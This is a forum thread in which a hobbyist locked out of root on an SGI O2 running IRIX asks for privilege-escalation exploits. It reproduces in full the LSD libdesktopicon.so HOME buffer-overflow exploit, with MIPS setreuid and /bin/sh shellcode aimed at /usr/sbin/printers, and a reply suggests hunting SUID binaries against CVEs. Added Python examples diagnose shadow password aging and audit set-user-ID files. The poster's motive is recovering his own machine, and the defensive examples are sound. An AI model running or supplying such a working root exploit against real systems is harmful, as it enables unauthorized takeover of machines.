Anyone have any go-to hacks/exploits to get IRIX root access?

gijoe77 (Member, joined Feb 18, 2019):
So I was playing with an older O2 (6.5.22m). I booted it and the DALLAS battery went dead, and I guess it must have reset the date to some very early date, enough that when I tried to log in as root it asked me to change the password (I actually don't even use a root password, I know, security lulz!). I thought no problem, so I changed the password, but it still won't let me log in; it asks me to change the password again. It's an endless loop of aged-out passwords or something.

When I put the drive back into a regularly functioning O2, I still can't log in as root, and the password I changed it to is not working. Both of the O2s I'm working on are the R10k models, so it would be a hassle currently to install the impacted root drive as an option drive to edit the /etc/shadow file. I thought an easier approach would be to just log into one of the guest accounts I have, run a local privilege elevation exploit, and edit the /etc/shadow file that way.

So I went through the various exploits I was able to find via Google, and basically all of the ones I was able to find were for older versions of IRIX; I wasn't able to find any for 6.5.30 (i.e., none that said they explicitly work for 6.5.30).

I have a go-to exploit that works for 6.5.22 (the file is called irx_libdesktopicon.c):
Code:
```c
/*## copyright LAST STAGE OF DELIRIUM jun 2003 poland        *://lsd-pl.net/ #*/
/*## libdesktopicon.so $HOME                                                 #*/

/* headers the original omitted (K&R-era source); needed for printf, exit,
   strlen, sprintf and execle to compile cleanly */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NOPNUM 1300
#define ADRNUM 900
#define PCHNUM 400

char setreuidcode[]=
    "\x30\x0b\xff\xff"    /* andi    $t3,$zero,0xffff     */
    "\x24\x02\x04\x01"    /* li      $v0,1024+1           */
    "\x20\x42\xff\xff"    /* addi    $v0,$v0,-1           */
    "\x03\xff\xff\xcc"    /* syscall                      */
    "\x30\x44\xff\xff"    /* andi    $a0,$v0,0xffff       */
    "\x31\x65\xff\xff"    /* andi    $a1,$t3,0xffff       */
    "\x24\x02\x04\x64"    /* li      $v0,1124             */
    "\x03\xff\xff\xcc"    /* syscall                      */
;

char shellcode[]=
    "\x04\x10\xff\xff"    /* bltzal  $zero,<shellcode>    */
    "\x24\x02\x03\xf3"    /* li      $v0,1011             */
    "\x23\xff\x01\x14"    /* addi    $ra,$ra,276          */
    "\x23\xe4\xff\x08"    /* addi    $a0,$ra,-248         */
    "\x23\xe5\xff\x10"    /* addi    $a1,$ra,-240         */
    "\xaf\xe4\xff\x10"    /* sw      $a0,-240($ra)        */
    "\xaf\xe0\xff\x14"    /* sw      $zero,-236($ra)      */
    "\xa3\xe0\xff\x0f"    /* sb      $zero,-241($ra)      */
    "\x03\xff\xff\xcc"    /* syscall                      */
    "/bin/sh"
;

char jump[]=
    "\x03\xa0\x10\x25"    /* move    $v0,$sp              */
    "\x03\xe0\x00\x08"    /* jr      $ra                  */
;

char nop[]="\x24\x0f\x12\x34";

int main(int argc,char **argv){
    char buffer[10000],adr[4],pch[4],*b,*envp[2];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM jun 2003 poland  //lsd-pl.net/\n");
    printf("libdesktopicon.so $HOME for irix 6.2 6.3 6.4 6.5 6.5.21 ");
    printf("IP:ALL\n\n");

    if(argc!=2){
        printf("usage: %s xserver:display\n",argv[0]);
        exit(-1);
    }

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+8580+3056+600;
    *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+8580+400+31552;

    envp[0]=buffer;
    envp[1]=0;

    b=buffer;
    sprintf(b,"HOME=");
    b+=5;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    for(i=0;i<1+4-((strlen(argv[1])%4));i++) *b++=0xff;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b=0;

    execle("/usr/sbin/printers","lsd","-display",argv[1],0,envp);
    return 0;
}
```
Once I ran this on a regular user account, I was able to modify /etc/shadow.

I've been thinking of upgrading to 6.5.30 from 6.5.22, but this exploit (I tend to think of it more as a time saver for me) won't work in 6.5.30. Other than playing around with setting up an external SCSI case and mounting my problem drive that way, I'm wondering if anyone has a slick exploit handy that works with 6.5.30 as well.
 
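The lockout described in the post above is a password-aging problem, and the place to look once the drive is mounted elsewhere is the third field of the root line in /etc/shadow. The following added example (not from the thread, not IRIX code) parses shadow(4)-style entries and evaluates the conventional aging rules for a chosen "today", so you can see what a reset clock does: after a password change made while the clock reads 1970-01-01, the "last changed" day becomes 0, which is the conventional "must change at next login" marker. The field layout and rules are the ones documented for shadow(4) generally; treating them as what IRIX 6.5.22m does at login is an assumption, and the sample lines and hashes are constructed placeholders. The "clock_skew" status is a sanity check added here, not a login rule.

```python
# Added example: evaluate shadow(4)-style password aging for a given date.
# Assumption: IRIX follows the conventional 9-field layout
#   name:hash:lastchg:min:max:warn:inactive:expire:flag
# with day numbers counted from 1970-01-01. Sample entries are constructed.
from dataclasses import dataclass, replace
from datetime import date
from typing import Dict, Iterable, Optional, Union

EPOCH = date(1970, 1, 1)
DateLike = Union[date, str]   # accept ISO strings too, e.g. "2019-03-01"


@dataclass(frozen=True)
class ShadowEntry:
    name: str
    hash: str
    lastchg: Optional[int]    # days since epoch of last change; 0 = must change
    min_days: Optional[int]
    max_days: Optional[int]
    warn: Optional[int]
    inactive: Optional[int]
    expire: Optional[int]     # absolute day number on which the account expires


def _num(field: str) -> Optional[int]:
    field = field.strip()
    return int(field) if field else None


def _as_date(day: DateLike) -> date:
    return day if isinstance(day, date) else date.fromisoformat(day)


def days_since_epoch(day: DateLike) -> int:
    return (_as_date(day) - EPOCH).days


def parse_shadow_line(line: str) -> ShadowEntry:
    """Parse one shadow line; absent trailing fields are treated as empty."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2 or not fields[0]:
        raise ValueError(f"malformed shadow line: {line!r}")
    fields += [""] * (9 - len(fields))
    return ShadowEntry(
        name=fields[0], hash=fields[1],
        lastchg=_num(fields[2]), min_days=_num(fields[3]),
        max_days=_num(fields[4]), warn=_num(fields[5]),
        inactive=_num(fields[6]), expire=_num(fields[7]),
    )


def aging_status(entry: ShadowEntry, today: DateLike) -> str:
    """Return 'ok', 'must_change', 'expired', 'account_expired' or 'clock_skew'."""
    now = days_since_epoch(today)
    if entry.expire is not None and now >= entry.expire:
        return "account_expired"
    if entry.lastchg is None:            # aging disabled for this account
        return "ok"
    if entry.lastchg == 0:               # conventional "change at next login"
        return "must_change"
    if entry.lastchg > now:              # diagnostic: last change is in the future
        return "clock_skew"
    if entry.max_days is not None and entry.lastchg + entry.max_days < now:
        return "expired"
    return "ok"


def after_password_change(entry: ShadowEntry, today: DateLike) -> ShadowEntry:
    """A password change records today's day number in lastchg."""
    return replace(entry, lastchg=days_since_epoch(today))


def diagnose(lines: Iterable[str], today: DateLike) -> Dict[str, str]:
    """Status of every entry in `lines` as of `today`."""
    entries = [parse_shadow_line(l) for l in lines if l.strip()]
    return {e.name: aging_status(e, today) for e in entries}


# Constructed sample file: root changed its password on day 17945 (2019-02-18)
# with a 90-day maximum; guest has aging disabled.
SAMPLE_SHADOW = [
    "root:PLACEHOLDER_HASH:17945:0:90:7:::",
    "guest:PLACEHOLDER_HASH:17945::::::",
]

if __name__ == "__main__":
    print("normal clock  :", diagnose(SAMPLE_SHADOW, "2019-03-01"))
    print("reset clock   :", diagnose(SAMPLE_SHADOW, EPOCH))
    root = parse_shadow_line(SAMPLE_SHADOW[0])
    looped = after_password_change(root, EPOCH)
    print("after change on reset clock: lastchg =", looped.lastchg,
          "->", aging_status(looped, EPOCH))
```

Run against a copy of the recovered shadow file with the real date, and the entry whose third field reads 0 (or lies in the future) is the one the clock reset damaged; correcting that one number, rather than the hash, is what ends the loop under these rules.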

Elf (Storybook / Retired, ex-staff, joined Feb 4, 2019, Mountain West (US)):
Nothing specifically on hand, but a search of the SUID root binaries combined with a CVE search may yield interesting results :)
 
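The inventory step in the reply above is also the standard hardening check an administrator runs on any box they are responsible for: list every set-user-ID file and compare it with what the installed software is supposed to ship, so anything unexpected stands out. The added example below (not from the thread, standard library only) does that walk and baseline comparison; the directory tree it builds and the baseline path list are constructed for demonstration and are not a real IRIX file list.

```python
# Added example: inventory set-user-ID files under a tree and flag any that
# are not in a known-good baseline. The demo tree and baseline are constructed.
import os
import stat
import tempfile
from typing import Dict, Iterable, List, Tuple


def find_setuid(root: str) -> Dict[str, Dict[str, int]]:
    """Return {path: {"uid": owner, "mode": permission bits}} for every regular
    file under `root` with the set-user-ID bit. Symlinks are not followed, and
    files that vanish or cannot be stat'ed are skipped rather than aborting."""
    found: Dict[str, Dict[str, int]] = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found[path] = {"uid": st.st_uid, "mode": stat.S_IMODE(st.st_mode)}
    return found


def unexpected_setuid(found: Dict[str, Dict[str, int]],
                      baseline: Iterable[str], root: str) -> List[str]:
    """Root-relative paths that carry SUID but are absent from the baseline."""
    allowed = set(baseline)
    rel = (os.path.relpath(p, root) for p in found)
    return sorted(r for r in rel if r not in allowed)


def build_demo_tree(base: str) -> str:
    """Construct a throwaway tree: one expected SUID file, one plain file and
    one SUID file that is not in the baseline."""
    os.makedirs(os.path.join(base, "usr", "sbin"), exist_ok=True)
    layout = [
        ("usr/sbin/expected", 0o4755),   # in the baseline
        ("usr/sbin/plain", 0o755),       # no SUID bit, must not be reported
        ("usr/sbin/surprise", 0o4711),   # SUID, not in the baseline
    ]
    for rel, mode in layout:
        path = os.path.join(base, rel)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(path, mode)
    return base


DEMO_BASELINE = ["usr/sbin/expected"]   # constructed, not a real IRIX list


def demo_audit() -> Tuple[List[str], List[str]]:
    """Build the demo tree, audit it, and return (all SUID paths, unexpected)."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        found = find_setuid(tmp)
        all_suid = sorted(os.path.relpath(p, tmp) for p in found)
        return all_suid, unexpected_setuid(found, DEMO_BASELINE, tmp)


if __name__ == "__main__":
    suid, extra = demo_audit()
    print("setuid files :", suid)
    print("not in baseline:", extra)
```

On a real system the baseline comes from the package manifests (on IRIX the inst database), and the interesting lines in the report are the ones that are neither in a manifest nor explain themselves; those are the candidates to check against the vendor advisories and the CVE database, or to strip of the SUID bit if nothing needs it.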

flexion (Active member, joined Sep 23, 2020, Switzerland):
Shouldn't it be possible to boot sash and stuff from an install CD, or over the net for the miniroot, and then mount the disk?
Something like this..?
 

gijoe77 (Member, joined Feb 18, 2019):
flexion wrote: "Shouldn't it be possible to boot sash and stuff from an install CD, or over the net for the miniroot, and then mount the disk? Something like this..?"

Yeah, that's another way of doing it; it's still a hassle though (need a working CD-ROM, gotta have the install media handy).
 
